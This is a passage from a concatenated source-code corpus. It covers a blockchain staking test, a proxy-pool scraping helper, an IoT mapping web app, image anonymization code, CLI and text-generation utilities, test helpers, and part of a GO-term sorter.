for i in range(100): # mine 100 blocks
hash = self.gen_pow_block(0, average_block_time, block_time_spread)
self.sync_all()
# Here we create the outputs in nodes[2] that should be combined
n2_addr = self.nodes[2].getnewaddress()
n2_utxos_to_combine_in_stake = 10
n2_amount_per_address = Decimal('110')
# the condition for combination; utxos will be added until we reach 'STAKE_COMBINE_THRESHOLD' nebls
# note: The outcome can be > STAKE_COMBINE_THRESHOLD
assert (n2_utxos_to_combine_in_stake - 1) * n2_amount_per_address <= STAKE_COMBINE_THRESHOLD
for i in range(n2_utxos_to_combine_in_stake):
addresses_vs_amounts_node2 = {n2_addr: n2_amount_per_address}
tx_for_n2 = self.create_tx_with_output_amounts(self.nodes[0].listunspent(), addresses_vs_amounts_node2)
signed_tx_for_n2 = self.nodes[0].signrawtransaction(tx_for_n2)
self.nodes[0].sendrawtransaction(signed_tx_for_n2['hex'])
# Here we create the outputs in nodes[2] that should be combined, except for one output
n3_addr = self.nodes[3].getnewaddress()
n3_utxos_to_combine_in_stake = 10 # the amount we expect to be combined
n3_amount_per_address = Decimal('120')
# the condition for combination; utxos will be added until we reach 'STAKE_COMBINE_THRESHOLD' nebls
# note: The outcome can be > STAKE_COMBINE_THRESHOLD
assert (n3_utxos_to_combine_in_stake - 1) * n3_amount_per_address > STAKE_COMBINE_THRESHOLD
for i in range(n3_utxos_to_combine_in_stake):
addresses_vs_amounts_node3 = {n3_addr: n3_amount_per_address}
tx_for_n3 = self.create_tx_with_output_amounts(self.nodes[0].listunspent(), addresses_vs_amounts_node3)
signed_tx_for_n3 = self.nodes[0].signrawtransaction(tx_for_n3)
self.nodes[0].sendrawtransaction(signed_tx_for_n3['hex'])
for i in range(800): # mine 800 blocks
hash = self.gen_pow_block(0, average_block_time, block_time_spread)
self.sync_all()
n1_balance_before = self.nodes[1].getbalance()
n2_balance_before = self.nodes[2].getbalance()
n3_balance_before = self.nodes[3].getbalance()
# move to the future to make coins stakable (this is not needed because 10 minutes is too short)
# self.progress_mock_time(60*10)
block_count_to_stake = 30
# We can't stake more than the outputs we have
assert block_count_to_stake <= outputs_count
assert_equal(len(self.nodes[1].generatepos(1)), 0)
for i in range(block_count_to_stake):
hash = self.gen_pos_block(1)
self.sync_all()
# check that the total number of blocks is the PoW mined + PoS mined
for n in self.nodes:
assert_equal(n.getblockcount(), 1000 + block_count_to_stake)
# test that combining stakes below the threshold STAKE_COMBINE_THRESHOLD will combine them
balance_before = self.nodes[2].getbalance()
assert_equal(balance_before, n2_utxos_to_combine_in_stake * n2_amount_per_address)
hash_n2 = self.gen_pos_block(2)
self.sync_all()
# we expect all inputs to be joined in one stake, so the remaining confirmed amount is zero
balance_after = self.nodes[2].getbalance()
assert_equal(balance_after, Decimal('0'))
staked_block_in_n2 = self.nodes[2].getblock(hash_n2, True, True)
# in the staked block, transaction 1 has 'n3_amount_per_address' inputs,
# which are all combined to create this stake
# Combined because the age > STAKE_SPLIT_AGE and the total amount is < STAKE_COMBINE_THRESHOLD
assert_equal(len(staked_block_in_n2['tx'][1]['vin']), n2_utxos_to_combine_in_stake)
#
# test that combining stakes above the threshold STAKE_COMBINE_THRESHOLD will combine them up to that threshold
balance_before = self.nodes[3].getbalance()
assert_equal(balance_before, n3_utxos_to_combine_in_stake * n3_amount_per_address)
hash_n3 = self.gen_pos_block(3)
self.sync_all()
# we expect all inputs to be joined in one stake, except for one output
balance_after = self.nodes[3].getbalance()
# since we're a tick over the threshold, we expect one utxo to be left unspent in staking
assert_equal(balance_after, n3_amount_per_address)
staked_block_in_n3 = self.nodes[3].getblock(hash_n3, True, True)
# in the staked block, transaction 1 has 'n3_amount_per_address' inputs,
# which are all combined to create this stake
# Combined because the age > STAKE_SPLIT_AGE and the total amount is < STAKE_COMBINE_THRESHOLD
assert_equal(len(staked_block_in_n3['tx'][1]['vin']), n3_utxos_to_combine_in_stake - 1)
# ensure that the desired output has value in it
assert staked_block_in_n3['tx'][1]['vout'][1]['value'] > 0
# attempt to send the staked nebls before they mature (to nodes[0])
inputs = [{"txid": staked_block_in_n3['tx'][1]['txid'], "vout": 1}]
outputs = {self.nodes[0].getnewaddress(): 20}
test_maturity_rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
test_maturity_signed_rawtx = self.nodes[3].signrawtransaction(test_maturity_rawtx)
for node in self.nodes: # spending stake before maturity should be rejected in all nodes
assert_raises_rpc_error(-26, "bad-txns-premature-spend-of-coinstake", node.sendrawtransaction, test_maturity_signed_rawtx['hex'])
# we stake blocks that total to 'COINBASE_MATURITY' blocks, and the staked block to mature
for i in range(COINBASE_MATURITY):
# it should not be possible to submit the transaction until the maturity is reached
assert_raises_rpc_error(-26, "bad-txns-premature-spend-of-coinstake", self.nodes[0].sendrawtransaction,
test_maturity_signed_rawtx['hex'])
hash = self.gen_pos_block(0)
self.sync_all()
for node in self.nodes: # spending that stake should be accepted in all nodes after maturity
node.sendrawtransaction(test_maturity_signed_rawtx['hex'])
self.sync_all()
n4_addr = self.nodes[4].getnewaddress()
n4_utxos_to_split_in_stake = 1 # the amount we expect to be combined
n4_amount_per_address = Decimal('2000')
# the condition for combination; utxos will be added until we reach 'STAKE_COMBINE_THRESHOLD' nebls
# note: The outcome can be > STAKE_COMBINE_THRESHOLD
for i in range(n4_utxos_to_split_in_stake):
addresses_vs_amounts_node3 = {n4_addr: n4_amount_per_address}
tx_for_n4 = self.create_tx_with_output_amounts(self.nodes[0].listunspent(), addresses_vs_amounts_node3)
signed_tx_for_n4 = self.nodes[0].signrawtransaction(tx_for_n4)
self.nodes[0].sendrawtransaction(signed_tx_for_n4['hex'])
# we stake a few blocks in nodes[0] to reach block maturity before
blocks_to_stake = 40 * 2
assert block_count_to_stake * STAKE_TARGET_SPACING < STAKE_SPLIT_AGE
for _ in range(blocks_to_stake): # 80 blocks = 80 * 30 = 40 minutes
hash_n0 = self.gen_pos_block(0)
self.sync_all()
n4_balance_to_stake = Decimal('2000')
assert_equal(self.nodes[4].getbalance(), n4_balance_to_stake)
hash_n4 = self.gen_pos_block(4)
staked_block_in_n4 = self.nodes[4].getblock(hash_n4, True, True)
# 1 input should be split into two outputs because stake time is less than nStakeSplitAge
assert_equal(len(staked_block_in_n4['tx'][1]['vin']), 1)
assert_equal(len(staked_block_in_n4['tx'][1]['vout']), 3) # 1 empty output + 2 split outputs
assert_equal(staked_block_in_n4['tx'][1]['vout'][0]['value'], Decimal('0'))
assert_equal(staked_block_in_n4['tx'][1]['vout'][1]['value'], n4_balance_to_stake/2)
assert Decimal('1000') < staked_block_in_n4['tx'][1]['vout'][2]['value'] < Decimal('1001')
self.sync_all()
assert n2_balance_before < self.nodes[2].getbalance()
# TODO: determine rewards while staking
# the balance can never be determined because times are random
# assert_equal(self.nodes[1].getbalance(), Decimal("110001.30160111"))
# assert_equal(self.nodes[2].getbalance(), Decimal("1100.08679167"))
# assert_equal(self.nodes[3].getbalance(), Decimal("120"))
if __name__ == '__main__':
RawTransactionsTest().main()
|
zhihuAnswerSpider/spider/Proxy_pool.py | takhello/spider_collection | 106 | 12670824 | import requests
import yaml
import os
'''Special thanks to https://github.com/jhao104/proxy_pool for providing the proxy pool service.'''
'''This class is a thin wrapper around that project's HTTP API to make it easier to call.'''
StopEvent = object()
class Proxy_pool():
    # Defaults to the local machine's IP; the port is the default port of the proxy_pool project.
host="127.0.0.1"
port="5010"
def __init__(self):
config=open(os.getcwd()+"\\config.yaml",mode="r",encoding="utf-8")
cfg=config.read()
yaml_line=yaml.load(stream=cfg,Loader=yaml.FullLoader)
self.host=yaml_line["host"]
self.port=yaml_line["port"]
def get_proxy(self):
return requests.get("http://{host}:{port}/get/".format(host=self.host,port=self.port)).json()
def delete_proxy(self,proxy):
requests.get("http://{host}:{port}/delete/?proxy={}".format(host=self.host,port=self.port,proxy=proxy))
    # your spider code
    def get_response(self, url, headers, https=False, cookie="", retry_count=5):
        if https:
            is_https = self.get_proxy().get("https")
            print(is_https)
        while retry_count > 0:
            proxy = self.get_proxy().get("proxy")
            try:
                # fetch the URL through the proxy
                response = requests.get(url=url, headers=headers, cookies=cookie, proxies={"http": "http://{}".format(proxy)})
                return response
            except Exception:
                retry_count -= 1
                # remove the failing proxy from the pool and retry with a fresh one
                self.delete_proxy(proxy)
        # every retry failed
        return None
    def post_response(self, url, headers, cookie, data, retry_count=5):
        while retry_count > 0:
            proxy = self.get_proxy().get("proxy")
            try:
                # send the POST request through the proxy
                response = requests.post(url=url, headers=headers, data=data, cookies=cookie, proxies={"http": "http://{}".format(proxy)})
                return response
            except Exception:
                retry_count -= 1
                # remove the failing proxy from the pool and retry with a fresh one
                self.delete_proxy(proxy)
        # every retry failed
        return None
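# Minimal usage sketch: it assumes config.yaml (host/port) sits in the working
# directory and a proxy_pool service (https://github.com/jhao104/proxy_pool)
# is running; the target URL below is only an example.
if __name__ == "__main__":
    pool = Proxy_pool()
    resp = pool.get_response("http://httpbin.org/ip", headers={"User-Agent": "Mozilla/5.0"})
    print(resp.status_code if resp is not None else "all retries failed")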
|
labs/iot/gps-lab/code/web-app/app.py | chagen24/iot-curriculum | 126 | 12670900 | import os
from flask import Flask, render_template
from azure.eventhub import EventHubConsumerClient
from flask_socketio import SocketIO
from threading import Thread
# Load the environment variables
maps_key = os.environ["MAPS_KEY"]
connection_string = os.environ["CONNECTION_STRING"]
consumer_group_name = "$Default"
# Create the website with Flask
app = Flask(__name__)
# Create a secret key to keep the client side socket.io sessions secure.
# We are generating a random 24 digit Hex Key.
app.config["SECRET_KEY"] = os.urandom(24)
# Create the socket.io app
socketio = SocketIO(app, async_mode="threading")
thread = Thread()
# When a message is received from IoT hub, broadcast it to all clients that are listening through socket
def on_event_batch(partition_context, events):
# Loop through all the events on the event hub - each event is a message from IoT Hub
for event in events:
# Send the event over the socket
socketio.emit("mapdata", {"data": event.body_as_str()}, namespace="/get_data", broadcast=True)
# Update the event hub checkpoint so we don't get the same messages again if we reconnect
partition_context.update_checkpoint()
# A background method that is triggered by socket.io. This method connects to the Event Hub compatible endpoint
# on the IoT Hub and listens for messages
def event_hub_task():
# Create the event hub client to receive messages from IoT hub
client = EventHubConsumerClient.from_connection_string(
conn_str=connection_string,
consumer_group=consumer_group_name
)
# Set up the batch receiving of messages
with client:
client.receive_batch(on_event_batch=on_event_batch)
# This method is called when a request comes in for the root page
@app.route("/")
def root():
# Create data for the home page to pass the maps key
data = { "maps_key" : maps_key }
# Return the rendered HTML page
return render_template("index.html", data = data)
# This is called when the socket on the web page connects to the socket.
# This starts a background thread that listens on the event hub
@socketio.on("connect", namespace="/get_data")
def socketio_connect():
global thread
print("Client connected")
# If the thread is not already running, start it as a socket.io background task to
# listen on messages from IoT Hub
if not thread.is_alive():
thread = socketio.start_background_task(event_hub_task)
# The main method - if this app is run via the command line, it starts the socket.io app.
def main():
socketio.run(app)
if __name__ == "__main__":
main()
|
tests/matchers.py | mattdricker/lms | 113 | 12670927 | """Objects that compare equal to other objects for testing."""
from h_matchers import Any
from pyramid.response import Response
def temporary_redirect_to(location):
"""Return a matcher for any `HTTP 302 Found` redirect to the given URL."""
return Any.instance_of(Response).with_attrs(
{"status_code": 302, "location": location}
)
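# Illustrative use in a test (hypothetical view function, not from this module):
#
#     response = views.start_lti_launch(request)
#     assert response == temporary_redirect_to("http://example.com/next")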
|
src/main/anonymization/detection_anonymization.py | BMW-InnovationLab/BMW-Anonymization-API | 108 | 12670950 | <filename>src/main/anonymization/detection_anonymization.py
from anonymization.base_anonymization import BaseAnonymization
from PIL import ImageFilter, Image
def find_boxes(bbox):
nb = []
for i in bbox:
nb.append(i)
return nb
class DetectionAnonymization(BaseAnonymization):
def __init__(self):
pass
def blurring(self, image, response, degree=None, id=None, mask=None):
"""
Blur the detected objects based on the user's requirements
:param image: input image
:param response: The response parsed from the object detection api
:param degree: The degree of the anonymization (specified in the user_configuration file)
:param id:
:param mask:
:return: The anonymized image
"""
boxes = find_boxes(response)
for i in boxes:
cropped_image = image.crop((i[0], i[1], i[2], i[3]))
blurred_image = cropped_image.filter(ImageFilter.GaussianBlur(25*float(degree)))
image.paste(blurred_image, (i[0], i[1], i[2], i[3]))
return image
def pixelating(self, image, response, degree=None, id=None, mask=None):
"""
Pixelate the detected objects based on the user's requirements
:param image: input image
:param response: The response parsed from the object detection api
:param degree: The degree of the anonymization (specified in the user_configuration file)
:param id:
:param mask:
:return: The anonymized image
"""
boxes = find_boxes(response)
for i in boxes:
cropped_image = image.crop((i[0], i[1], i[2], i[3]))
w, h = cropped_image.size
small = cropped_image.resize((int(w / (float(degree) * w)), int(h / (float(degree) * h))), Image.BILINEAR)
result = small.resize(cropped_image.size, Image.NEAREST)
image.paste(result, (i[0], i[1], i[2], i[3]))
return image
def blackening(self, image, response, degree=None, id=None, mask=None):
"""
Blacken the detected objects based on the user's requirements
:param image: input image
:param response: The response parsed from the object detection api
:param degree: The degree of the anonymization (specified in the user_configuration file)
:param id:
:param mask:
:return: The anonymized image
"""
boxes = find_boxes(response)
for i in boxes:
cropped = image.crop((i[0], i[1], i[2], i[3]))
            w, h = cropped.size
            black = Image.new(str(image.mode), (w, h), 'black')
result = Image.blend(cropped, black, float(degree))
cropped.paste(result)
image.paste(cropped, (i[0], i[1], i[2], i[3]))
return image
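# Minimal usage sketch (synthetic image and a hand-written box list standing in
# for the parsed detection response; assumes this file is run with the service's
# src/main directory on the path so the `anonymization` package import resolves).
if __name__ == "__main__":
    img = Image.new("RGB", (200, 200), "white")
    boxes = [[20, 20, 120, 120]]  # [xmin, ymin, xmax, ymax]
    out = DetectionAnonymization().pixelating(img, boxes, degree=0.2)
    print(out.size)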
|
verde/tests/utils.py | fatiando/verde | 415 | 12670973 | # Copyright (c) 2017 The Verde Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
#
# This code is part of the Fatiando a Terra project (https://www.fatiando.org)
#
"""
Testing utilities.
"""
import pytest
try:
import numba
except ImportError:
numba = None
def requires_numba(function):
"""
Skip the decorated test if numba is not installed.
"""
mark = pytest.mark.skipif(numba is None, reason="requires numba")
return mark(function)
|
Sources/Workflows/XLixian/iambus-xunlei-lixian/lixian_cli_parser.py | yagosys/AlfredWorkflow.com | 2,177 | 12670974 |
def expand_windows_command_line(args):
from glob import glob
expanded = []
for x in args:
try:
xx = glob(x)
except:
xx = None
if xx:
expanded += xx
else:
expanded.append(x)
return expanded
def expand_command_line(args):
import platform
return expand_windows_command_line(args) if platform.system() == 'Windows' else args
def parse_command_line(args, keys=[], bools=[], alias={}, default={}, help=None):
args = expand_command_line(args)
options = {}
for k in keys:
options[k] = None
for k in bools:
options[k] = None
left = []
args = args[:]
while args:
x = args.pop(0)
if x == '--':
left.extend(args)
break
if x.startswith('-'):
k = x.lstrip('-')
if k in bools:
options[k] = True
elif k.startswith('no-') and k[3:] in bools:
options[k[3:]] = False
elif k in keys:
options[k] = args.pop(0)
elif '=' in k and k[:k.index('=')] in keys:
options[k[:k.index('=')]] = k[k.index('=')+1:]
elif k in alias:
k = alias[k]
if k in bools:
options[k] = True
else:
options[k] = args.pop(0)
else:
if help:
print 'Unknown option ' + x
print
print help
exit(1)
else:
raise RuntimeError('Unknown option '+x)
else:
left.append(x)
for k in default:
if options[k] is None:
options[k] = default[k]
class Args(object):
def __init__(self, args, left):
self.__dict__['_args'] = args
self.__dict__['_left'] = left
def __getattr__(self, k):
v = self._args.get(k, None)
if v:
return v
if '_' in k:
return self._args.get(k.replace('_', '-'), None)
def __setattr__(self, k, v):
self._args[k] = v
def __getitem__(self, i):
if type(i) == int:
return self._left[i]
else:
return self._args[i]
def __setitem__(self, i, v):
if type(i) == int:
self._left[i] = v
else:
self._args[i] = v
def __len__(self):
return len(self._left)
def __str__(self):
return '<Args%s%s>' % (self._args, self._left)
return Args(options, left)
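# Minimal usage sketch (hypothetical option names, not taken from the real
# lixian command set): '--output' is declared as a value option and '-v' as a flag.
if __name__ == '__main__':
    args = parse_command_line(['download', '--output', 'a.bin', '-v', 'task1'],
                              keys=['output'], bools=['v'])
    print args.output, args.v, args[0], len(args)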
|
min-char-rnn/markov-model.py | eliben/deep-learning-samples | 183 | 12670978 | # Simple n-gram (Markov chain) model for character-based text generation.
#
# Only tested with Python 3.6+
#
# <NAME> (http://eli.thegreenplace.net)
# This code is in the public domain
from __future__ import print_function
from collections import defaultdict, Counter
import random
import sys
# This is the length of the "state" the current character is predicted from.
# For Markov chains with memory, this is the "order" of the chain. For n-grams,
# the n is STATE_LEN+1 since it includes the predicted character as well.
STATE_LEN = 4
def weighted_from_counter(c):
total = sum(c.values())
idx = random.randrange(total)
for elem, count in c.most_common():
idx -= count
if idx < 0:
return elem
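# For example, weighted_from_counter(Counter({'a': 3, 'b': 1})) returns 'a'
# about 75% of the time and 'b' about 25% of the time, i.e. it samples
# elements with probability proportional to their counts.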
def main():
filename = sys.argv[1]
with open(filename, 'r') as f:
data = f.read()
states = defaultdict(Counter)
print('Learning model...')
for i in range(len(data) - STATE_LEN - 1):
state = data[i:i + STATE_LEN]
next = data[i + STATE_LEN]
states[state][next] += 1
print('Model has {0} states'.format(len(states)))
j = 0
for k, v in states.items():
print(k, v)
if j > 9:
break
j += 1
print('Sampling...')
state = random.choice(list(states))
sys.stdout.write(state)
for i in range(200):
nextc = weighted_from_counter(states[state])
sys.stdout.write(nextc)
state = state[1:] + nextc
print()
if __name__ == '__main__':
main()
|
kur/sources/text.py | greedyuser/kur | 867 | 12670996 | <gh_stars>100-1000
import linecache
import numpy
import json
from ..sources import ChunkSource, DerivedSource
###############################################################################
class TextLength(DerivedSource):
""" Data source for audio lengths.
"""
def __init__(self, source, num_entries):
super().__init__()
self.source = source
self.num_entries = num_entries
def derive(self, inputs):
text_chunks, = inputs
return numpy.array([[len(x)] for x in text_chunks], dtype='int32')
def shape(self):
return (1,)
def requires(self):
return (self.source, )
def __len__(self):
return self.num_entries
###############################################################################
class TextSource(DerivedSource):
""" Data source for neat (non-ragged) one-hot represented text arrays.
"""
def __init__(self, source, vocab, num_entries, seq_len, padding='right', pad_with=None):
super().__init__()
self.num_entries = num_entries
self.source = source
self.seq_len = seq_len
self.padding = padding
self.pad_with = pad_with
self.vocab = vocab
self.char_to_int = {
c: i
for i, c in enumerate(self.vocab)
}
def _encode(self, char_seq):
output = numpy.zeros(shape=(len(char_seq), len(self.vocab),))
for i in range(len(char_seq)):
output[i][self.char_to_int[char_seq[i]]] = 1
assert output.shape[0] == len(char_seq)
return output
def derive(self, inputs):
text_chunk, = inputs
output = numpy.zeros(
shape=(
len(text_chunk),
self.seq_len,
len(self.vocab),
),
dtype='int32'
)
for i, char_seq in enumerate(text_chunk):
char_seq = list(char_seq)
if self.padding == 'right':
if self.pad_with is not None:
char_seq = char_seq + (self.seq_len - len(char_seq)) * [self.pad_with]
encoded_char_seq = self._encode(char_seq)
assert len(encoded_char_seq) == len(char_seq)
for j in range(len(encoded_char_seq)):
output[i][j] = encoded_char_seq[j]
elif self.padding == 'left':
if self.pad_with is not None:
char_seq = (self.seq_len - len(char_seq)) * [self.pad_with] + char_seq
encoded_char_seq = self._encode(char_seq)
assert len(encoded_char_seq) == len(char_seq)
for j in range(len(encoded_char_seq)):
output[i][-len(char_seq) + j] = encoded_char_seq[j]
else:
				raise ValueError('Padding must be left or right, not %s' % self.padding)
return output
def shape(self):
""" Return the shape of the tensor (excluding batch size) returned by
this data source.
"""
return (self.seq_len, len(self.vocab),)
def requires(self):
return (self.source, )
def __len__(self):
return self.num_entries
###############################################################################
class RawText(ChunkSource):
""" Data source for text stored in JSONL format like:
['a', 'p', 'p', 'l', 'e', ' ', 'p', 'i', 'e']
"""
###########################################################################
@classmethod
def default_chunk_size(cls):
""" Returns the default chunk size for this source.
"""
return 256
###########################################################################
def shape(self):
return (None,)
###########################################################################
def __init__(self, source, key, num_entries, *args, **kwargs):
""" Creates a new Text source for file named `source`.
"""
super().__init__(*args, **kwargs)
self.source = source
self.num_entries = num_entries
self.key = key
self.indices = numpy.arange(len(self))
###########################################################################
def __iter__(self):
""" Return an iterator to the data. Yield the value for self.key
from each object
"""
start = 0
while start < self.num_entries:
end = min(self.num_entries, start + self.chunk_size)
# linecache line numbering starts at 1
batch = [
json.loads(
linecache.getline(
self.source,
i + 1
).strip()
)[self.key]
for i in self.indices[start:end]
]
yield batch
start = end
###########################################################################
def __len__(self):
""" Returns the total number of entries that this source can return, if
known.
"""
return self.num_entries
###########################################################################
def can_shuffle(self):
""" This source can be shuffled.
"""
return True
###########################################################################
def shuffle(self, indices):
""" Applies a permutation to the data.
"""
if len(indices) > len(self):
raise ValueError('Shuffleable was asked to apply permutation, but '
'the permutation is longer than the length of the data set.')
self.indices[:len(indices)] = self.indices[:len(indices)][indices]
|
tests/helpers/test_bbox_helper.py | wqliu657/DSNet | 113 | 12671019 | <gh_stars>100-1000
import numpy as np
from helpers import bbox_helper
def test_lr2cw():
lr_bbox = np.array([[1, 3], [2, 7], [19, 50]])
output = bbox_helper.lr2cw(lr_bbox)
answer = np.array([[2, 2], [4.5, 5], [34.5, 31]])
assert np.isclose(output, answer).all()
lr_bbox = np.array([[1.25, 2.75], [1.485, 3.123]])
output = bbox_helper.lr2cw(lr_bbox)
answer = np.array([[2, 1.5], [2.304, 1.638]])
assert np.isclose(output, answer).all()
def test_cw2lr():
cw_bbox = np.array([[2, 8], [6, 7]])
output = bbox_helper.cw2lr(cw_bbox)
answer = np.array([[-2, 6], [2.5, 9.5]])
assert np.isclose(output, answer).all()
cw_bbox = np.array([[1.524, 9.428], [4.518, 1.025]])
output = bbox_helper.cw2lr(cw_bbox)
answer = np.array([[-3.19, 6.238], [4.0055, 5.0305]])
assert np.isclose(output, answer).all()
def test_seq2bbox():
sequence = np.array([0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1])
output = bbox_helper.seq2bbox(sequence)
answer = [[1, 5], [8, 10], [15, 18]]
assert np.isclose(output, answer).all()
assert not bbox_helper.seq2bbox(np.array([0, 0, 0])).any()
assert not bbox_helper.seq2bbox(np.array([])).any()
class TestIou(object):
def setup(self):
self.anchor_lr = np.array(
[[1, 5], [1, 5], [1, 5], [1, 5], [1, 5]], dtype=np.float32)
self.target_lr = np.array(
[[1, 5], [0, 6], [2, 4], [3, 8], [8, 9]], dtype=np.float32)
self.anchor_cw = bbox_helper.lr2cw(self.anchor_lr)
self.target_cw = bbox_helper.lr2cw(self.target_lr)
self.answer = np.array([1, 4 / 6, 2 / 4, 2 / 7, 0])
def test_iou_lr(self):
output = bbox_helper.iou_lr(self.anchor_lr, self.target_lr)
assert np.isclose(output, self.answer).all()
def test_iou_cw(self):
output = bbox_helper.iou_cw(self.anchor_cw, self.target_cw)
assert np.isclose(output, self.answer).all()
def test_nms():
scores = np.array([0.9, 0.8, 0.7, 0.6])
bboxes = np.array([[1, 5], [2, 4], [4, 8], [5, 9]])
keep_scores, keep_bboxes = bbox_helper.nms(scores, bboxes, 0.5)
ans_scores = [0.9, 0.7]
ans_bboxes = [[1, 5], [4, 8]]
assert np.isclose(keep_scores, ans_scores).all()
assert np.isclose(keep_bboxes, ans_bboxes).all()
|
django_loci/channels/consumers.py | Purhan/django-loci | 205 | 12671042 | <reponame>Purhan/django-loci<filename>django_loci/channels/consumers.py<gh_stars>100-1000
from ..models import Location
from .base import BaseLocationBroadcast
class LocationBroadcast(BaseLocationBroadcast):
model = Location
|
src/gausskernel/dbmind/tools/ai_server/main.py | Yanci0/openGauss-server | 360 | 12671050 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#############################################################################
# Copyright (c): 2021, Huawei Tech. Co., Ltd.
# FileName : main.py
# Version :
# Date : 2021-4-7
# Description : Function entry file
#############################################################################
try:
import sys
import os
import argparse
sys.path.insert(0, os.path.dirname(__file__))
from common.utils import Common, CONFIG_PATH
from common.logger import CreateLogger
except ImportError as err:
sys.exit("main.py: Failed to import module: %s." % str(err))
LOGGER = CreateLogger("debug", "start_service.log").create_log()
current_dirname = os.path.dirname(os.path.realpath(__file__))
__version__ = '1.0.0'
__description__ = 'anomaly_detection: anomaly detection tool.'
__epilog__ = """
epilog:
the 'a-detection.conf' will be read when the program is running,
the location of them is:
dbmind.conf: {detection}.
""".format(detection=CONFIG_PATH)
def usage():
usage_message = """
# start service.
python main.py start [--role {{agent,server}}]
# stop service.
python main.py stop [--role {{agent,server}}]
"""
return usage_message
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description=__description__,
usage=usage(),
epilog=__epilog__)
parser.add_argument('mode', choices=['start', 'stop'])
parser.add_argument('--role', choices=['agent', 'server'],
help="Run as 'agent', 'server'. "
"notes: ensure the normal operation of the openGauss in agent.")
parser.add_argument('-v', '--version', action='version')
parser.version = __version__
return parser.parse_args()
def manage_service(args):
server_pid_file = os.path.join(current_dirname, './tmp/server.pid')
agent_pid_file = os.path.join(current_dirname, './tmp/agent.pid')
if args.role == 'server':
from service.my_app import MyApp
if args.mode == 'start':
MyApp(server_pid_file, LOGGER).start_service(CONFIG_PATH)
else:
MyApp(server_pid_file, LOGGER).stop_service()
elif args.role == 'agent':
from agent.manage_agent import Agent
if args.mode == 'start':
get_data_path = "ps -ux | grep -v grep | grep gaussdb"
std, _ = Common.execute_cmd(get_data_path)
if not std:
raise Exception("The GaussDb process does not exists, please check it.")
Agent(agent_pid_file, LOGGER).start_agent(CONFIG_PATH)
else:
Agent(agent_pid_file, LOGGER).stop_agent()
else:
print('FATAL: incorrect parameter.')
print(usage())
return -1
def main():
args = parse_args()
if args.mode in ('start', 'stop') and args.role:
try:
manage_service(args)
except Exception as err_msg:
print(err_msg)
sys.exit(1)
else:
print("FATAL: incorrect parameter.")
print(usage())
return -1
if __name__ == '__main__':
main()
|
goatools/grouper/sorter.py | flying-sheep/goatools | 477 | 12671052 | """Sorts GO IDs or user-provided sections containing GO IDs."""
__copyright__ = "Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved."
__author__ = "<NAME>"
import sys
import collections as cx
from goatools.wr_tbl import prt_txt
from goatools.grouper.sorter_nts import SorterNts
from goatools.grouper.sorter_gos import SorterGoIds
from goatools.grouper.wr_sections import WrSectionsTxt
class Sorter(object):
"""Sorts GO IDs or user-provided sections containing GO IDs.
User GO IDs grouped under header GO IDs are not sorted by the Grouper class.
Sort both user GO IDs in a group and header GO IDs across groups with these:
S: use_sections
s: section_sortby (T=True, F=False, S=lambda sort function)
h: hdrgo_sortby Sorts hdr GO IDs
u: sortby Sorts user GO IDs
P: hdrgo_prt If True, Removes GO IDs used as GO group headers; Leaves list in
sorted order, but removes header GO IDs which are not user GO IDs.
rm_h hdr_sort usr_sort S s h u p
--- ------------ ------------ -- -- -- -- --
case 1: NO hdrgo_sortby usrgo_sortby N T H U T
case 2: YES hdrgo_sortby usrgo_sortby N T H U F
case 3: NO section_order usrgo_sortby S F - U T
case 4: YES section_order usrgo_sortby S F - U F
case 5: YES |<--- section_sortby --->| S S - - -
|print|
sec usesec prthdr prtsec 1d 2d hdr usr
---- ------ ------ ------ -- -- --- ---
none - true - y . hdr usr A
none - false - y . ... usr B
yes False true - y . hdr usr A
yes False false - y . ... usr B
yes True True False . y hdr usr
yes True False False . y ... usr
"""
# Keywords for creating desc2nts
keys_nts = set(["hdrgo_prt", "section_prt", "top_n", "use_sections"])
def __init__(self, grprobj, **kws):
# Keyword arguments:
_sortby = kws.get('sortby')
_hdrgo_sortby = kws.get('hdrgo_sortby')
_section_sortby = kws.get('section_sortby')
# GO IDs are grouped, but not yet sorted
# print('SSSSSSSSSSS Sorter(sortby={} hdrgo_sortby={}, section_sortby={}'.format(
# _sortby, _hdrgo_sortby, _section_sortby))
self.grprobj = grprobj
# SorterGoIds can return either a 2-D list of sorted GO IDs or a flat sorted GO list
self.sortgos = SorterGoIds(grprobj, _sortby, _hdrgo_sortby)
self.sectobj = SorterNts(self.sortgos, _section_sortby) if grprobj.hdrobj.sections else None
def prt_gos(self, prt=sys.stdout, **kws_usr):
"""Sort user GO ids, grouped under broader GO terms or sections. Print to screen."""
# deprecated
# Keyword arguments (control content): hdrgo_prt section_prt use_sections
# desc2nts contains: (sections hdrgo_prt sortobj) or (flat hdrgo_prt sortobj)
desc2nts = self.get_desc2nts(**kws_usr)
# Keyword arguments (control print format): prt prtfmt
self.prt_nts(desc2nts, prt, kws_usr.get('prtfmt'))
return desc2nts
def prt_nts(self, desc2nts, prt=sys.stdout, prtfmt=None):
"""Print grouped and sorted GO IDs."""
# deprecated
# Set print format string
if prtfmt is None:
prtfmt = "{{hdr1usr01:2}} {FMT}\n".format(FMT=self.grprobj.gosubdag.prt_attr['fmt'])
# 1-D: data to print is a flat list of namedtuples
if 'flat' in desc2nts:
prt_txt(prt, desc2nts['flat'], prtfmt=prtfmt)
# 2-D: data to print is a list of [(section, nts), ...
else:
WrSectionsTxt.prt_sections(prt, desc2nts['sections'], prtfmt)
def get_desc2nts(self, **kws_usr):
"""Return grouped, sorted namedtuples in either format: flat, sections."""
# desc2nts contains: (sections hdrgo_prt sortobj) or (flat hdrgo_prt sortobj)
# keys_nts: hdrgo_prt section_prt top_n use_sections
kws_nts = {k:v for k, v in kws_usr.items() if k in self.keys_nts}
return self.get_desc2nts_fnc(**kws_nts)
def get_desc2nts_fnc(self, hdrgo_prt=True, section_prt=None,
top_n=None, use_sections=True):
"""Return grouped, sorted namedtuples in either format: flat, sections."""
# RETURN: flat list of namedtuples
nts_flat = self.get_nts_flat(hdrgo_prt, use_sections)
if nts_flat:
flds = nts_flat[0]._fields
if not use_sections:
return {'sortobj':self, 'flat' : nts_flat, 'hdrgo_prt':hdrgo_prt, 'flds':flds,
'num_items':len(nts_flat), 'num_sections':1}
else:
return {'sortobj':self,
